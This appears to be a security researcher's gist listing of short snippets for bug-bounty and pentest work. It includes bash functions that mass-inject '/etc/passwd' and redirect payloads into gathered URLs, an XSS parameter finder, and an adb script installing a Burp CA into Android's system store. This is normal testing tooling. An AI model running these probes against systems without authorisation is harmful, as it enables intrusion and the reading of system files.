dwisiswant0

#!/bin/bash

CIRCL="https://cve.circl.lu"

extract() {
	curl -sL "${1}" | xmllint --html --xpath "${2}" - 2>/dev/null
}

COUNT=1
for i in $(extract "${CIRCL}" "//td[@data-type='ID']/a/text()"); do

dwisiswant0

"""
The function check_password(password) is used by a safe with 4-digits passwords, and is 
susceptible to timing attacks. More specifically, it takes it around 0.1 seconds to check 
one digit – so brute-forcing all the possible combinations will take around 1,500 hours. 
Can you implement a way to crack its password in less than a minute?
"""

import time
import sys # ignore

dwisiswant0

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

dwisiswant0

#!/bin/bash

curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*

dwisiswant0

Command:

curl https://git.io/ -i -F "url=https://github.com/YOUR_GITHUB_URL" -F "code=YOUR_CUSTOM_NAME"

URLs that can be created is from:

• https://github.com/*
• https://*.github.com
• https://*.github.com/*
• https://*.github.io

dwisiswant0

lfi() {
	gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}

open-redirect() {
	local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}

dwisiswant0

nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	local T=""

	for i in `ls -1d ${TPL}/*/`; do
		if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then

dwisiswant0

assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

dwisiswant0

{
    "flags": "-HanrPz",
    "pattern": "('|\")SELECT[\\S+\\n\\r\\s]+FROM[\\S+\\n\\r\\s]+('|\").*(\\.|\\{).*[\\S+\\n\\r\\s]+;"
}

dwisiswant0

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!